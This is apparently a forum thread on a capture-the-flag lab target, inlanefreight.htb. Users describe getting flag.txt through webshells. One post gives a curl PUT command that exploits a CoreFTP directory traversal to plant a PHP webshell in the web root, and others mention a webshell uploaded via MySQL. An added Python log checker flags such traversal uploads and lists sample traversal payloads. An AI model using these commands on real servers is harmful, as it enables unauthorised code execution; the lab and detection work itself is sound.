(You are targeting the inlanefreight.htb domain. Assess the target server and obtain the contents of the flag.txt file. Submit it as the answer.)
Anyone know about that topic? I uploaded a webshell on the site, but only two commands are working: dir and whoami. Does anyone have any references?
Have you tried the command more?
Thanks for the response. I have already found the answer.
This one was quite a mess. You see so many opportunities that your head is spinning in every direction. After some time, I decided for myself to use the CoreFTP HTTP server directory traversal vulnerability. Then I started trying to upload wwwolf-php-webshell with curl (overkill):
curl -k -X PUT -H "Host: <IP>" --basic -u <user>:<password> -F 'fileX=@/path/to/wwwolf-php-webshell/webshell.php' 'https://IP/../../../../../..\xampp\htdocs\myshell.php'
After that it's a breeze. Just
dir "\flag.txt" on drive root with webshell UI
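A defender's view of the upload described above, as an added example that is not part of the original post: a log check that canonicalizes each request target and flags directory traversal, escalating when it arrives on a write method with a script extension. The log layout, the sample lines, and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in a generic access-log layout (assumption: the
# real server's log format will differ; adapt REQUEST_RE to it).
SAMPLE_LOG = [
    r'10.0.0.5 - u1 [01/Jan/2024:10:00:00] "GET /docs/readme.txt HTTP/1.1" 200',
    r'10.0.0.9 - u1 [01/Jan/2024:10:01:00] "PUT /uploads/report.pdf HTTP/1.1" 201',
    r'10.0.0.7 - u2 [01/Jan/2024:10:02:00] "PUT /..\xampp\htdocs\myshell.php HTTP/1.1" 200',
    r'10.0.0.7 - u2 [01/Jan/2024:10:03:00] "PUT /%2e%2e%5cxampp%5chtdocs%5ca.php HTTP/1.1" 200',
    r'10.0.0.8 - u3 [01/Jan/2024:10:04:00] "GET /a/..%252f..%252fwindows/win.ini HTTP/1.1" 404',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
WRITE_METHODS = {"PUT", "POST", "MOVE", "COPY"}
SCRIPT_EXTS = (".php", ".phtml", ".asp", ".aspx", ".jsp")


def canonical_segments(target):
    """Percent-decode (up to 3 rounds, to catch double encoding), treat
    backslashes as separators like Windows does, and split into segments."""
    path = target.split("?", 1)[0]
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return [seg for seg in path.replace("\\", "/").split("/") if seg]


def classify(line):
    """Return None for a clean request, else a severity string."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    segments = canonical_segments(match["target"])
    if ".." not in segments:
        return None
    if match["method"] not in WRITE_METHODS:
        return "medium"    # traversal on a read
    if segments[-1].lower().endswith(SCRIPT_EXTS):
        return "critical"  # traversal + write + server-side script extension
    return "high"          # traversal on a write


def alerts(lines):
    """(severity, line) pairs for every flagged line, in input order."""
    return [(sev, ln) for ln in lines if (sev := classify(ln))]
```

Checking the canonical form rather than the raw string is what catches the backslash and percent-encoded variants that a plain search for "../" would miss.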
Would you be able to message me with more details of how you did this? How did you get a webshell to the \xampp\htdocs?
I got the flag with some help from a friend. There are at least two ways to get the flag. One way, the way that I had help with from a friend, does not require a webshell or a php-reverse-shell.
Message me if you need help.
The post that @subrealz made is pretty much on the right track, but I could not figure it out from that post. Honestly, I probably would have never figured out the solution without some help.
I managed to get the flag with a webshell that I uploaded via SQL… It was limited and messy but it did the job.
I figured MySQL was the other path.